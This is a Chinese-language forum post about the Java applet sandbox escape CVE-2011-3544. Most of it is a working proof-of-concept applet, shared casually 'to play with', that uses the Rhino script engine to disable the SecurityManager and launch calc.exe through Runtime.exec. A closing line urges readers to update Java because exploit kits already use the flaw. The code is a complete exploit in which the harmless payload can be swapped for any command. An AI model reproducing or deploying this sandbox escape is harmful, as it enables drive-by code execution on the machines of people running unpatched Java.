老外发现的,详细描述看他的blog:http://schierlm.users.sourceforge.ne...2011-3544.html
这个老外很有趣,把细节讲的这么详细了,却不肯给出POC,说怕被坏人利用 ~~~
大哥,真怕被坏人利用乃就不要讲的这么详细好不好啊~
自己构造了个POC,要的拿去玩,反正迟早要进metaspolit
代码:
import java.applet.Applet;
import javax.script.*;
import javax.swing.JList;
public class ScriptEngineExp extends Applet {
private JList list;
public void init() {
try {
ScriptEngine se = new ScriptEngineManager().getEngineByName("js");
se.eval("var error = new Error(\"My error\");" +
"this.toString = function(){ " +
"java.lang.System.setSecurityManager(null);" +
"java.lang.Runtime.getRuntime().exec(\"calc.exe\");" +
"return \"exploit!\";};" +
"error.message = this;");
list = new JList(new Object[]{se.get("error")});
this.add(list);
} catch (ScriptException ex) {
ex.printStackTrace();
}
}
}
大家机子上有Java的,最好升级到最新版本,已经有exploit kit在用这个漏洞了